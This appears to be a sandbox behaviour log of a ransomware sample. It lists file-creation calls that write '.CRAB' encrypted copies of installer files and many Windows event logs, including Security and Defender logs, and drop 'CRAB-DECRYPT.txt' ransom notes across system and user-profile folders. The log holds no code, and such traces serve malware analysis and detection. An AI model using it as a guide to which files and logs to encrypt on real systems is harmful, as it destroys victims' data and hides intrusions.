Create C:\588bce7c90097ed212\RGB9Rast_x86.msi.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\SetupUi.xsd.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\SplashScreen.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\Strings.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\UiInfo.xml.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\588bce7c90097ed212\watermark.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\ESD\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Logs\Application.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\HardwareEvents.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Internet Explorer.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Key Management Service.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppReadiness%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppReadiness%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-International%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Known Folders API Service.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-LiveId%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-MUI%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-MUI%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-NCSI%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Ntfs%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Ntfs%4WHC.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SettingSync%4Debug.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SettingSync%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SMBClient%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SmbClient%4Security.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SMBServer%4Audit.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SMBServer%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-SMBServer%4Security.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Store%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-TWinUI%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-Winlogon%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Security.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Setup.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\System.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Logs\Windows PowerShell.evtx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\PerfLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Program Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Program Files (x86)\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Recovery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\System Volume Information\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\WindowsApps\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Network\Connections\Cm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Network\Connections\_hiddencm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
